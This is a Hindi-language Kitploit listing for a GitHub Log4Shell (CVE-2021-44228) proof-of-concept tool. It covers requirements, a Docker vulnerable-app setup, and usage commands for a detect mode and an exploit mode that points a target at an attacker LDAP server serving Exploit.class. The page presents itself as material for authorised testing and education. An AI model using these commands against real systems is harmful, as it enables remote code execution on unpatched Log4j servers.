Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4Shell — Log4Shell CVE-2021-44228 PoC | Kitploit
उपकरण/GitHubGitHub/moften/log4shell
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmoften/log4shell

Log4Shell

Log4Shell CVE-2021-44228 PoC

रिपॉजिटरी देखें
111 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4Shell

(CVE-2021-44228)

☠️ Log4Shell PoC (CVE-2021-44228)

Apache Log4j ≤ 2.14.1 में क्रिटिकल Log4Shell भेद्यता के लिए परीक्षण एक्सप्लॉइट, जो JNDI इंजेक्शन के माध्यम से रिमोट कोड निष्पादन की अनुमति देता है।

⚠️ यह PoC केवल शैक्षिक उद्देश्यों और अधिकृत वातावरणों में नियंत्रित परीक्षणों के लिए है। इसे स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।


आवश्यकताएँ

  • Python 3.x
  • Java 8 या उच्चतर
  • marshalsec (दुर्भावनापूर्ण LDAP सर्वर के लिए)
  • HTTP सर्वर (उदाहरण के लिए, python3 -m http.server)
  • Docker (भेद्य वातावरण के लिए वैकल्पिक)

स्थानीय परीक्षण वातावरण (Docker के साथ वैकल्पिक)

  1. भेद्य ऐप चलाएँ:

    root@kitploit:~
    docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
    
  2. यहाँ पहुँचें: http://localhost:8080

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

उपयोग

निष्क्रिय जाँच मोड:

root@kitploit:~
python3 main.py -u http://target.com -i burp.collab.net -m detect

आक्रामक मोड (आपके HTTP पर Exploit.class आवश्यक है):

root@kitploit:~
python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit

टूल डाउनलोड करें